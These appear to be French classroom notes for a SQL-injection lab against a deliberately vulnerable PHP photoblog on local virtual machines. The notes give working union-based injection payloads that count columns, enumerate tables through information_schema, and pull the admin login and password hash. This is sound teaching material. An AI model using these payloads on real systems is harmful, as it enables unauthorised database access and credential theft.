# Injection SQL

## Préparation
+ Créer une VM dans Workstation à partir de l'ISO dans N:
+ Créer une VM à partir de MariaDB.ova (adminer/abcd-1234)
+ Importer livres.sql

## Analyse du site
Les pages sont:
+ index.php
+ cat.php
+ show.php
+ all.php
+ admin/index.php

Les pages cat.php et show.php prennent des paramètres numériques (id=1 etc.)

La page d'admin ne prend pas de paramètres visibles

### Wireshark
Lancer Wireshark et observer VMnet8

+ Ouvrir la page 'test'
+ Requête GET

On voit les params et la réponse du serveur

+ Tenter de se connecter en admin
+ Requête POST

On voit les paramètres dans HTML Form

## Fonctionnement de l'injection

`show.php?id=1` --> SELECT * FROM table WHERE id=1

Une injection = manipuler la chaîne de caractères de la requête utilisée par la page.

### Test 1
SELECT * FROM table WHERE id=3-2

`cat.php?id=3-2` --> injectable

`show.php?id=3-2` --> pas injectable

### Exploitation
`cat.php?id=1 or 1=1` affiche toutes les catégories. Pourquoi?

#### UNION
```sql
select titre from livre where auteur like "Zviane" union 
select auteur from livre where auteur like "N%"
```
mais pas
```sql
select titre from livre where auteur like "Zviane" union 
select auteur,année from livre where auteur like "N%"
```
Aussi, SELECT affiche juste des colonnes:
```sql
select 1,2,3,4
```
On utilise ça pour deviner le nombre de colonnes

`cat.php?id=1 UNION SELECT 1` -> Erreur, nombre de colonnes différent

`cat.php?id=1 UNION SELECT 1,2,3,4` -> marche, on a 4 colonnes dans le résultat de la requête, 2 est affiché dans la page

Utiliser des fonctions SQL:

`cat.php?id=1 UNION SELECT 1,reverse("allo"),3,4`

`cat.php?id=1 UNION SELECT 1,current_user(),3,4`

`cat.php?id=1 UNION SELECT 1,database(),3,4` --> bd photoblog

`cat.php?id=1 UNION SELECT 1,table_name,3,4 from information_schema.tables` --> table users

`cat.php?id=1 UNION SELECT 1,column_name,3,4 from information_schema.columns WHERE table_name like "users"` --> login,password

`cat.php?id=1 UNION SELECT 1,login,3,4 from users` --> admin

`cat.php?id=1 UNION SELECT 1,password,3,4 from users WHERE login="admin"` --> 8efe310f9ab3efeae8d410a8e0166eb2




